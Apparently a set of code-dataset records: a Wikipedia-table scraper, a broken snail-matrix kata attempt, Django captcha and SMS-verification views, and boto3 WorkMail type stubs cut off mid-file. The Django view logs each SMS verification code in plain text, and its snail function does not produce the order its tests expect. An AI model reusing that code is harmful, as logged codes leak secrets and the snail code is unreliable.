+{"seq_id":"95775067","text":"#! /usr/bin/env python\n#coding=utf-8\nimport csv\nfrom urllib import urlopen\nfrom bs4 import BeautifulSoup as BS\n\nhtml = urlopen(\"http://en.wikipedia.org/wiki/Comparison_of_text_editors\")\nbsObj = BS(html, \"lxml\")\n\ntable = bsObj.findAll(\"table\", {\"class\": \"wikitable\"})[0]\nrows = table.findAll(\"tr\")\n\ncsvFile = open(\"editor.csv\", \"wt\")\nwriter = csv.writer(csvFile)\n\ntry:\n    for row in rows:\n        csvRow = []\n        for cell in row.findAll(['td', 'th']):\n            csvRow.append(cell.get_text())\n        writer.writerow(csvRow)\nfinally:\n    csvFile.close()","sub_path":"src/webscraping/data_to_csv.py","file_name":"data_to_csv.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"139450180","text":"def snail(snail_map):\n    n = len(snail_map)\n\n    out = []\n    if len(snail_map[0]) != n:\n        print('ERROR')\n    else:\n        for total in range(2*(n-1)):\n            j = total\n            i = total - j\n            while i < n and j < n:\n                out = outall(out, snail_map[i][j])\n                j += 1\n\n\n    return out\n\ndef outall(listfinal, newvalue):\n    if newvalue not in listfinal:\n        return listfinal + [newvalue]\n    else:\n        return listfinal\n\n\n#### TDD TESTING\nclass Test:\n    def assert_equals(value, expected):\n        from nose.tools import assert_equal\n        try:\n            assert_equal(value, expected)\n            print('EQUAL --> got =', value, \" == ex =\", expected)\n        except:\n            message = ' // # ' + str(value) + ' should == ' + str(expected)\n            print('UNEQUAL!!
--> got =', value, \" != ex =\", expected, message)\n\n    @classmethod\n    def describe(cls, param):\n        print(param)\n\n## TDD\narray = [[1,2,3],[4,5,6],[7,8,9]]\nexpected = [1,2,3,6,9,8,7,4,5]\nTest.assert_equals(snail(array), expected)\n\n\narray = [[1,2,3],[8,9,4],[7,6,5]]\nexpected = [1,2,3,4,5,6,7,8,9]\nTest.assert_equals(snail(array), expected)\n","sub_path":"4kyu_snail3.py","file_name":"4kyu_snail3.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"59398309","text":"# Python standard-library imports\nimport logging\nimport json\nimport random\nimport string\n\n# Django imports\nfrom django.shortcuts import render\nfrom django.views import View\nfrom django_redis import get_redis_connection\nfrom django.http import HttpResponse, JsonResponse\n\n# project-local helpers and packages\nfrom utils.captcha.captcha import captcha\nfrom utils.json_fun import to_json_data\nfrom utils.res_code import Code, error_map\nfrom . import constants\nfrom users.models import Users\nfrom . import forms\nfrom utils.yuntongxun.sms import CCP\n\n# set up the logger\nlogger = logging.getLogger('django')\n\nclass ImageCode(View):\n\n    \"\"\"\n    create image_code\n    # 1. define a class-based view\n    \"\"\"\n    def get(self,request,image_code_id):\n        \"\"\"\n        # 2. get the parameters from the front end\n        # 3. validate the parameters\n        # 4. generate the captcha image and its text\n\n        \"\"\"\n        text, image = captcha.generate_captcha()\n        # logger.info(\"Image code: {}\".format(text))\n        # 5. save the captcha text to redis\n        con_redis = get_redis_connection(alias = 'verify_code')\n        img_key = \"img_{}\".format(image_code_id).encode('utf-8')\n        con_redis.setex(img_key, constants.IMAGE_CODE_REDIS_EXPIRES,text)\n        logger.info(text)\n        # 6. return the captcha image to the front end\n        return HttpResponse(content=image, content_type=\"image/jpg\")\n\n# define a class-based view\n# validate the parameters\n#   path params, query-string params, form data, Ajax payloads\n# query the database\n# return the validation result\nclass CheckUsernameView(View):\n    def get(self,request,username):\n        # count = Users.objects.filter(username=username.count())\n        # if not user:\n        #     return HttpResponse('username is available')\n        # else:\n        #     return HttpResponse('username is taken')\n        data = {\n            'username': username,\n            'count': Users.objects.filter(username=username).count()\n        }\n        return to_json_data(data=data)\n\n\n\nclass CheckMobileView(View):\n    \"\"\"\n    check whether the registered mobile number already exists\n    GET mobiles/(?P<mobile>1[3-9]\\d{9})/\n    \"\"\"\n\n    def get(self, request, mobile):\n\n        data = {\n            'mobile': mobile,\n            'count': Users.objects.filter(mobile=mobile).count()\n        }\n        return to_json_data(data=data)\n\n\n# 1. define a class-based view\n# 2. get the JSON data sent from the front end\n# 3. validate the parameters\n# 4. send the SMS verification code\n# 5. save the SMS code text and a send-record flag to redis\n# 6. return JSON data to the front end\n\nclass SmsCodesView(View):\n    def post(self, request):\n        json_data = request.body\n        if not json_data:\n            return to_json_data(errno=Code.PARAMERR,errmsg=error_map[Code.PARAMERR])\n        # convert the JSON payload to a dict\n        dict_data = json.loads(json_data.decode('utf8'))\n\n        # mobile = dict_data.get('mobile')\n        # image_code_id = dict_data.get('image_code_id')\n        # text = dict_data.get('text')\n\n        form = forms.CheckImgCodeForm(data=dict_data)\n        if form.is_valid():\n            # get the mobile number\n            mobile = form.cleaned_data.get('mobile')\n            # build the SMS verification code\n            sms_num = \"%06d\" % random.randint(0, 999999)\n\n            redis_conn = get_redis_connection('verify_code')\n            # flag marking whether an SMS was already sent within the last 60s\n\n            sms_flag_fmt = \"sms_flag_{}\".format(mobile).encode('utf8')\n            # key under which the SMS verification code text is stored\n            sms_text_fmt = \"sms_{}\".format(mobile).encode('utf8')\n            # pl = redis_conn.pipeline()\n            redis_conn.setex(sms_flag_fmt,constants.SEND_SMS_CODE_INTERVAL,1)\n            a = redis_conn.setex(sms_text_fmt, 300, sms_num)\n            print(a)\n\n            # try:\n            #
pl.setex(sms_flag_fmt.encode('utf8'),constants.SEND_SMS_CODE_INTERVAL,1)\n            #     pl.setex(sms_text_fmt.encode('utf8'),constants.SMS_CODE_REDIS_EXPIRES,sms_num)\n            #     pl.execute()\n            # except Exception as e:\n            #     logger.debug(\"redis operation raised an exception: {}\".format(e))\n            #     return to_json_data(errno=Code.UNKOWNERR,errmsg=error_map[Code.UNKOWNERR])\n\n            logger.info(\"SMS verification code sent [OK][mobile: %s sms_code: %s]\" % (mobile, sms_num))\n            return to_json_data(errmsg=\"SMS verification code sent successfully\")\n\n            # error marks a serious failure\n            # info is a mild notice\n            # warning is a gentle alert\n\n            # try:\n            #     result = CCP().send_template_sms(mobile,[sms_num,constants.SMS_CODE_YUNTX_EXPIRES],constants.SMS_CODE_TEMP_ID)\n            #\n            # except Exception as e:\n            #     logger.error(\"sending SMS verification code [exception][mobile: %s,message: %s]\" % (mobile,e))\n            #     return to_json_data(errno=Code.SMSERROR,errmsg=error_map[Code.SMSERROR])\n            # else:\n            #     if result == 0:\n            #         logger.info(\"SMS verification code sent [OK][ mobile: %s sms_code: %s]\" % (mobile, sms_num))\n            #         return to_json_data(errmsg=\"SMS verification code sent successfully\")\n            #     else:\n            #         logger.warning(\"sending SMS verification code [failed][ mobile: %s ]\" % mobile)\n            #         return to_json_data(errno=Code.SMSFAIL, errmsg=error_map[Code.SMSFAIL])\n\n\n\n\n        else:\n            # collect the error messages in a list\n            err_msg_list = []\n            for item in form.errors.get_json_data().values():\n                err_msg_list.append(item[0].get('message'))\n\n                # print(item[0].get('message'))  # for test\n\n            err_msg_str = '/'.join(err_msg_list)  # join the error messages into one string\n            # return JSON data to the front end\n            return to_json_data(errno=Code.PARAMERR, errmsg=err_msg_str)\n\n\n\n\n\n\n\n","sub_path":"djangoproject1/apps/verifications/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"185431180","text":"\"\"\"\nType annotations for workmail service client.\n\n[Open documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html)\n\nUsage::\n\n    ```python\n    import boto3\n    from mypy_boto3_workmail import WorkMailClient\n\n    client: WorkMailClient = boto3.client(\"workmail\")\n    ```\n\"\"\"\nimport sys\nfrom typing import Any, Dict, List, Type, overload\n\nfrom botocore.client import BaseClient, ClientMeta\n\nfrom .literals import (\n    AccessControlRuleEffectType,\n    ImpersonationRoleTypeType,\n    MobileDeviceAccessRuleEffectType,\n    PermissionTypeType,\n    ResourceTypeType,\n)\nfrom .paginator import (\n    ListAliasesPaginator,\n    ListAvailabilityConfigurationsPaginator,\n    ListGroupMembersPaginator,\n    ListGroupsPaginator,\n    ListMailboxPermissionsPaginator,\n    ListOrganizationsPaginator,\n    ListResourceDelegatesPaginator,\n    ListResourcesPaginator,\n    ListUsersPaginator,\n)\nfrom .type_defs import (\n    AssumeImpersonationRoleResponseTypeDef,\n    BookingOptionsTypeDef,\n    CreateGroupResponseTypeDef,\n    CreateImpersonationRoleResponseTypeDef,\n    CreateMobileDeviceAccessRuleResponseTypeDef,\n    CreateOrganizationResponseTypeDef,\n    CreateResourceResponseTypeDef,\n    CreateUserResponseTypeDef,\n    DeleteOrganizationResponseTypeDef,\n    DescribeEmailMonitoringConfigurationResponseTypeDef,\n    DescribeGroupResponseTypeDef,\n    DescribeInboundDmarcSettingsResponseTypeDef,\n    DescribeMailboxExportJobResponseTypeDef,\n    DescribeOrganizationResponseTypeDef,\n    DescribeResourceResponseTypeDef,\n    DescribeUserResponseTypeDef,\n    DomainTypeDef,\n    EwsAvailabilityProviderTypeDef,\n    FolderConfigurationTypeDef,\n    GetAccessControlEffectResponseTypeDef,\n    GetDefaultRetentionPolicyResponseTypeDef,\n    GetImpersonationRoleEffectResponseTypeDef,\n    GetImpersonationRoleResponseTypeDef,\n    GetMailboxDetailsResponseTypeDef,\n    GetMailDomainResponseTypeDef,\n
GetMobileDeviceAccessEffectResponseTypeDef,\n GetMobileDeviceAccessOverrideResponseTypeDef,\n ImpersonationRuleTypeDef,\n LambdaAvailabilityProviderTypeDef,\n ListAccessControlRulesResponseTypeDef,\n ListAliasesResponseTypeDef,\n ListAvailabilityConfigurationsResponseTypeDef,\n ListGroupMembersResponseTypeDef,\n ListGroupsResponseTypeDef,\n ListImpersonationRolesResponseTypeDef,\n ListMailboxExportJobsResponseTypeDef,\n ListMailboxPermissionsResponseTypeDef,\n ListMailDomainsResponseTypeDef,\n ListMobileDeviceAccessOverridesResponseTypeDef,\n ListMobileDeviceAccessRulesResponseTypeDef,\n ListOrganizationsResponseTypeDef,\n ListResourceDelegatesResponseTypeDef,\n ListResourcesResponseTypeDef,\n ListTagsForResourceResponseTypeDef,\n ListUsersResponseTypeDef,\n StartMailboxExportJobResponseTypeDef,\n TagTypeDef,\n TestAvailabilityConfigurationResponseTypeDef,\n)\n\nif sys.version_info >= (3, 8):\n from typing import Literal\nelse:\n from typing_extensions import Literal\n\n__all__ = (\"WorkMailClient\",)\n\nclass BotocoreClientError(BaseException):\n MSG_TEMPLATE: str\n\n def __init__(self, error_response: Dict[str, Any], operation_name: str) -> None:\n self.response: Dict[str, Any]\n self.operation_name: str\n\nclass Exceptions:\n ClientError: Type[BotocoreClientError]\n DirectoryInUseException: Type[BotocoreClientError]\n DirectoryServiceAuthenticationFailedException: Type[BotocoreClientError]\n DirectoryUnavailableException: Type[BotocoreClientError]\n EmailAddressInUseException: Type[BotocoreClientError]\n EntityAlreadyRegisteredException: Type[BotocoreClientError]\n EntityNotFoundException: Type[BotocoreClientError]\n EntityStateException: Type[BotocoreClientError]\n InvalidConfigurationException: Type[BotocoreClientError]\n InvalidCustomSesConfigurationException: Type[BotocoreClientError]\n InvalidParameterException: Type[BotocoreClientError]\n InvalidPasswordException: Type[BotocoreClientError]\n LimitExceededException: Type[BotocoreClientError]\n MailDomainInUseException: Type[BotocoreClientError]\n MailDomainNotFoundException: Type[BotocoreClientError]\n MailDomainStateException: Type[BotocoreClientError]\n NameAvailabilityException: Type[BotocoreClientError]\n OrganizationNotFoundException: Type[BotocoreClientError]\n OrganizationStateException: Type[BotocoreClientError]\n ReservedNameException: Type[BotocoreClientError]\n ResourceNotFoundException: Type[BotocoreClientError]\n TooManyTagsException: Type[BotocoreClientError]\n UnsupportedOperationException: Type[BotocoreClientError]\n\nclass WorkMailClient(BaseClient):\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html)\n \"\"\"\n\n meta: ClientMeta\n\n @property\n def exceptions(self) -> Exceptions:\n \"\"\"\n WorkMailClient exceptions.\n \"\"\"\n def associate_delegate_to_resource(\n self, *, OrganizationId: str, ResourceId: str, EntityId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Adds a member (user or group) to the resource's set of delegates.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.associate_delegate_to_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#associate_delegate_to_resource)\n \"\"\"\n def associate_member_to_group(\n self, *, OrganizationId: str, GroupId: str, 
MemberId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Adds a member (user or group) to the group's set.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.associate_member_to_group)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#associate_member_to_group)\n \"\"\"\n def assume_impersonation_role(\n self, *, OrganizationId: str, ImpersonationRoleId: str\n ) -> AssumeImpersonationRoleResponseTypeDef:\n \"\"\"\n Assumes an impersonation role for the given WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.assume_impersonation_role)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#assume_impersonation_role)\n \"\"\"\n def can_paginate(self, operation_name: str) -> bool:\n \"\"\"\n Check if an operation can be paginated.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.can_paginate)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#can_paginate)\n \"\"\"\n def cancel_mailbox_export_job(\n self, *, ClientToken: str, JobId: str, OrganizationId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Cancels a mailbox export job.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.cancel_mailbox_export_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#cancel_mailbox_export_job)\n \"\"\"\n def close(self) -> None:\n \"\"\"\n Closes underlying endpoint connections.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.close)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#close)\n \"\"\"\n def create_alias(self, *, OrganizationId: str, EntityId: str, Alias: str) -> Dict[str, Any]:\n \"\"\"\n Adds an alias to the set of a given member (user or group) of WorkMail.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.create_alias)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#create_alias)\n \"\"\"\n def create_availability_configuration(\n self,\n *,\n OrganizationId: str,\n DomainName: str,\n ClientToken: str = None,\n EwsProvider: \"EwsAvailabilityProviderTypeDef\" = None,\n LambdaProvider: \"LambdaAvailabilityProviderTypeDef\" = None\n ) -> Dict[str, Any]:\n \"\"\"\n Creates an `AvailabilityConfiguration` for the given WorkMail organization and\n domain.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.create_availability_configuration)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#create_availability_configuration)\n \"\"\"\n def create_group(self, *, OrganizationId: str, Name: str) -> CreateGroupResponseTypeDef:\n \"\"\"\n Creates a group that can be used in WorkMail by calling the RegisterToWorkMail\n operation.\n\n [Show boto3 
documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.create_group)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#create_group)\n \"\"\"\n def create_impersonation_role(\n self,\n *,\n OrganizationId: str,\n Name: str,\n Type: ImpersonationRoleTypeType,\n Rules: List[\"ImpersonationRuleTypeDef\"],\n ClientToken: str = None,\n Description: str = None\n ) -> CreateImpersonationRoleResponseTypeDef:\n \"\"\"\n Creates an impersonation role for the given WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.create_impersonation_role)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#create_impersonation_role)\n \"\"\"\n def create_mobile_device_access_rule(\n self,\n *,\n OrganizationId: str,\n Name: str,\n Effect: MobileDeviceAccessRuleEffectType,\n ClientToken: str = None,\n Description: str = None,\n DeviceTypes: List[str] = None,\n NotDeviceTypes: List[str] = None,\n DeviceModels: List[str] = None,\n NotDeviceModels: List[str] = None,\n DeviceOperatingSystems: List[str] = None,\n NotDeviceOperatingSystems: List[str] = None,\n DeviceUserAgents: List[str] = None,\n NotDeviceUserAgents: List[str] = None\n ) -> CreateMobileDeviceAccessRuleResponseTypeDef:\n \"\"\"\n Creates a new mobile device access rule for the specified WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.create_mobile_device_access_rule)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#create_mobile_device_access_rule)\n \"\"\"\n def create_organization(\n self,\n *,\n Alias: str,\n DirectoryId: str = None,\n ClientToken: str = None,\n Domains: List[\"DomainTypeDef\"] = None,\n KmsKeyArn: str = None,\n EnableInteroperability: bool = None\n ) -> CreateOrganizationResponseTypeDef:\n \"\"\"\n Creates a new WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.create_organization)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#create_organization)\n \"\"\"\n def create_resource(\n self, *, OrganizationId: str, Name: str, Type: ResourceTypeType\n ) -> CreateResourceResponseTypeDef:\n \"\"\"\n Creates a new WorkMail resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.create_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#create_resource)\n \"\"\"\n def create_user(\n self, *, OrganizationId: str, Name: str, DisplayName: str, Password: str\n ) -> CreateUserResponseTypeDef:\n \"\"\"\n Creates a user who can be used in WorkMail by calling the RegisterToWorkMail\n operation.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.create_user)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#create_user)\n \"\"\"\n def delete_access_control_rule(self, *, OrganizationId: str, Name: str) -> Dict[str, Any]:\n \"\"\"\n 
Deletes an access control rule for the specified WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_access_control_rule)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_access_control_rule)\n \"\"\"\n def delete_alias(self, *, OrganizationId: str, EntityId: str, Alias: str) -> Dict[str, Any]:\n \"\"\"\n Remove one or more specified aliases from a set of aliases for a given user.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_alias)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_alias)\n \"\"\"\n def delete_availability_configuration(\n self, *, OrganizationId: str, DomainName: str\n ) -> Dict[str, Any]:\n \"\"\"\n Deletes the `AvailabilityConfiguration` for the given WorkMail organization and\n domain.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_availability_configuration)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_availability_configuration)\n \"\"\"\n def delete_email_monitoring_configuration(self, *, OrganizationId: str) -> Dict[str, Any]:\n \"\"\"\n Deletes the email monitoring configuration for a specified organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_email_monitoring_configuration)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_email_monitoring_configuration)\n \"\"\"\n def delete_group(self, *, OrganizationId: str, GroupId: str) -> Dict[str, Any]:\n \"\"\"\n Deletes a group from WorkMail.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_group)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_group)\n \"\"\"\n def delete_impersonation_role(\n self, *, OrganizationId: str, ImpersonationRoleId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Deletes an impersonation role for the given WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_impersonation_role)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_impersonation_role)\n \"\"\"\n def delete_mailbox_permissions(\n self, *, OrganizationId: str, EntityId: str, GranteeId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Deletes permissions granted to a member (user or group).\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_mailbox_permissions)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_mailbox_permissions)\n \"\"\"\n def delete_mobile_device_access_override(\n self, *, OrganizationId: str, UserId: str, DeviceId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Deletes the mobile device access override for the given WorkMail organization,\n user, and device.\n\n [Show boto3 
documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_mobile_device_access_override)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_mobile_device_access_override)\n \"\"\"\n def delete_mobile_device_access_rule(\n self, *, OrganizationId: str, MobileDeviceAccessRuleId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Deletes a mobile device access rule for the specified WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_mobile_device_access_rule)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_mobile_device_access_rule)\n \"\"\"\n def delete_organization(\n self, *, OrganizationId: str, DeleteDirectory: bool, ClientToken: str = None\n ) -> DeleteOrganizationResponseTypeDef:\n \"\"\"\n Deletes an WorkMail organization and all underlying AWS resources managed by\n WorkMail as part of the organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_organization)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_organization)\n \"\"\"\n def delete_resource(self, *, OrganizationId: str, ResourceId: str) -> Dict[str, Any]:\n \"\"\"\n Deletes the specified resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_resource)\n \"\"\"\n def delete_retention_policy(self, *, OrganizationId: str, Id: str) -> Dict[str, Any]:\n \"\"\"\n Deletes the specified retention policy from the specified organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_retention_policy)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_retention_policy)\n \"\"\"\n def delete_user(self, *, OrganizationId: str, UserId: str) -> Dict[str, Any]:\n \"\"\"\n Deletes a user from WorkMail and all subsequent systems.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.delete_user)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#delete_user)\n \"\"\"\n def deregister_from_work_mail(self, *, OrganizationId: str, EntityId: str) -> Dict[str, Any]:\n \"\"\"\n Mark a user, group, or resource as no longer used in WorkMail.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.deregister_from_work_mail)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#deregister_from_work_mail)\n \"\"\"\n def deregister_mail_domain(self, *, OrganizationId: str, DomainName: str) -> Dict[str, Any]:\n \"\"\"\n Removes a domain from WorkMail, stops email routing to WorkMail, and removes the\n authorization allowing WorkMail use.\n\n [Show boto3 
documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.deregister_mail_domain)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#deregister_mail_domain)\n \"\"\"\n def describe_email_monitoring_configuration(\n self, *, OrganizationId: str\n ) -> DescribeEmailMonitoringConfigurationResponseTypeDef:\n \"\"\"\n Describes the current email monitoring configuration for a specified\n organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.describe_email_monitoring_configuration)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#describe_email_monitoring_configuration)\n \"\"\"\n def describe_group(self, *, OrganizationId: str, GroupId: str) -> DescribeGroupResponseTypeDef:\n \"\"\"\n Returns the data available for the group.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.describe_group)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#describe_group)\n \"\"\"\n def describe_inbound_dmarc_settings(\n self, *, OrganizationId: str\n ) -> DescribeInboundDmarcSettingsResponseTypeDef:\n \"\"\"\n Lists the settings in a DMARC policy for a specified organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.describe_inbound_dmarc_settings)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#describe_inbound_dmarc_settings)\n \"\"\"\n def describe_mailbox_export_job(\n self, *, JobId: str, OrganizationId: str\n ) -> DescribeMailboxExportJobResponseTypeDef:\n \"\"\"\n Describes the current status of a mailbox export job.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.describe_mailbox_export_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#describe_mailbox_export_job)\n \"\"\"\n def describe_organization(self, *, OrganizationId: str) -> DescribeOrganizationResponseTypeDef:\n \"\"\"\n Provides more information regarding a given organization based on its\n identifier.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.describe_organization)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#describe_organization)\n \"\"\"\n def describe_resource(\n self, *, OrganizationId: str, ResourceId: str\n ) -> DescribeResourceResponseTypeDef:\n \"\"\"\n Returns the data available for the resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.describe_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#describe_resource)\n \"\"\"\n def describe_user(self, *, OrganizationId: str, UserId: str) -> DescribeUserResponseTypeDef:\n \"\"\"\n Provides information regarding the user.\n\n [Show boto3 
